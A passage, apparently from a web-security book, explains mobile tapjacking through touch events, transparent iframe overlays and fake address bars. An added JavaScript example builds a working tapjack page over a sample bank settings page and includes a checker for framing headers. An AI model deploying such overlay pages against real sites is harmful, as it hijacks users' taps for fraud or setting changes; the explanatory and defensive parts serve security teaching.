Smartphones like Apple's iPhone give the user a more direct control method: the touchscreen. From the point of view of the operating system (OS), a screen touch is an event; the phone's OS captures these events and acts on them, and the browser in turn exposes them to the web page as touch events that a script can observe.
For example, a single touchscreen gesture may generate the following events:
- touchstart: fired when the finger touches the screen
- touchend: fired when the finger leaves the screen
- touchmove: fired while the finger slides across the screen
- touchcancel: fired when the system cancels the touch (for example, because another application takes over)
By laying an invisible iframe over the current web page, an attacker can tapjack the user's touch: the user sees and taps what looks like a harmless control, but the touch is delivered to the transparent frame stacked on top of it.
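As an added example (not code from the original text), the following JavaScript shows both halves of the tapjacking setup described above: an attacker page that stacks a fully transparent iframe over a decoy button, and a check a tester or defender can run against a target page's response headers to decide whether that page can be framed at all (X-Frame-Options and CSP frame-ancestors). The target URL, the decoy/control coordinates and the origins are made-up assumptions; the block runs under Node and uses nothing beyond the standard URL class.

```javascript
// Added example; not from the original text. All URLs, coordinates and origins
// below are constructed for illustration.

// Work out where to position the transparent iframe so that the sensitive control
// inside the framed page lands exactly under the decoy the user is meant to tap.
//   decoy   = page-pixel position of the bait element on the attacker's page
//   control = position of the real button inside the target page
function overlayOffset(decoy, control) {
  return { top: decoy.y - control.y, left: decoy.x - control.x };
}

// The framed target sits on top (z-index) but is fully transparent (opacity 0), so
// the user sees the decoy while every touch goes to the iframe. The listeners only
// log the touchstart/touchmove/touchend/touchcancel sequence for illustration; the
// hijack itself is purely a stacking-and-transparency trick and needs no script.
function buildTapjackPage(targetUrl, decoy, control) {
  const { top, left } = overlayOffset(decoy, control);
  return `<!doctype html>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
  #decoy { position:absolute; top:${decoy.y}px; left:${decoy.x}px; width:200px; height:60px; }
  #cover { position:absolute; top:${top}px; left:${left}px; width:1200px; height:2400px;
           border:0; opacity:0; z-index:2; }
</style>
<button id="decoy">Tap to continue</button>
<iframe id="cover" src="${targetUrl}" scrolling="no"></iframe>
<script>
  for (const t of ['touchstart', 'touchmove', 'touchend', 'touchcancel']) {
    document.addEventListener(t, e => console.log(t, e.touches.length), { passive: true });
  }
</script>`;
}

// Evaluate the frame-ancestors directive of a CSP header against the origin that
// wants to do the framing. Returns null when the directive is absent. Handles the
// common source forms ('none', 'self', '*', scheme sources such as https:, and host
// sources with an optional *. wildcard); ports and paths are not modelled.
function frameAncestorsAllow(csp, attackerOrigin, targetOrigin) {
  const directive = csp.split(';')
    .map(d => d.trim())
    .find(d => /^frame-ancestors(\s|$)/i.test(d));
  if (!directive) return null;
  const sources = directive.split(/\s+/).slice(1).map(s => s.toLowerCase());
  if (sources.length === 0 || sources.includes("'none'")) return false;
  const a = new URL(attackerOrigin);
  for (const src of sources) {
    if (src === '*') return true;
    if (src === "'self'") { if (attackerOrigin === targetOrigin) return true; continue; }
    const m = src.match(/^([a-z][a-z0-9+.-]*):(?:\/\/(.*))?$/);
    let host = src;
    if (m) {
      if (m[1] + ':' !== a.protocol) continue;   // scheme given and it does not match
      if (m[2] === undefined) return true;       // bare scheme source, e.g. https:
      host = m[2];
    }
    if (host.startsWith('*.')) {
      if (a.hostname.endsWith(host.slice(1))) return true;
    } else if (host === a.hostname) {
      return true;
    }
  }
  return false;
}

// Can attackerOrigin put the target page (served with these headers) in an iframe?
// CSP frame-ancestors takes precedence over X-Frame-Options when both are present.
function canBeFramed(headers, attackerOrigin, targetOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const csp = h['content-security-policy'];
  if (csp) {
    const verdict = frameAncestorsAllow(csp, attackerOrigin, targetOrigin);
    if (verdict !== null) return verdict;
  }
  const xfo = (h['x-frame-options'] || '').trim().toLowerCase();
  if (xfo === 'deny') return false;
  if (xfo === 'sameorigin') return attackerOrigin === targetOrigin;
  // No header, or an unrecognised/obsolete value (ALLOW-FROM) that current browsers ignore.
  return true;
}

// Constructed sample: a target that sends no framing protection at all.
const sample = { 'Content-Type': 'text/html' };
console.log('framable:', canBeFramed(sample, 'https://evil.example', 'https://bank.example'));
console.log(buildTapjackPage('https://bank.example/settings', { x: 40, y: 300 }, { x: 520, y: 880 }));
```

In practice, run canBeFramed against the real headers of the page you intend to overlay: if it returns false, the invisible-iframe trick fails before any touch event matters, which is why frame-ancestors 'none' (with X-Frame-Options: DENY for older browsers) is the first thing to check on either side of the attack.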
Because screen space on a phone is limited, the mobile browser even hides its own address bar once the page scrolls. This makes visual deception much easier on the phone than on the desktop.
In the three screenshots compared here: on the left, the browser's real address bar is at the very top, while the attacker has drawn a fake address bar inside the page below it; in the middle, the real address bar has been auto-hidden, so only the fake one drawn by the page remains visible; on the right, the browser's address bar is hidden normally, with no fake bar. A user who cannot tell the page-drawn bar from the real one will trust whatever URL the attacker chooses to display, so this visual trick can be exploited for phishing and fraud. In December 2010,* it was found that tapjacking on Android could even be used to change the system's security settings, and a demonstration was published at the same time.
As browsers gain more features tailored to mobile devices, we will probably see many other kinds of attack.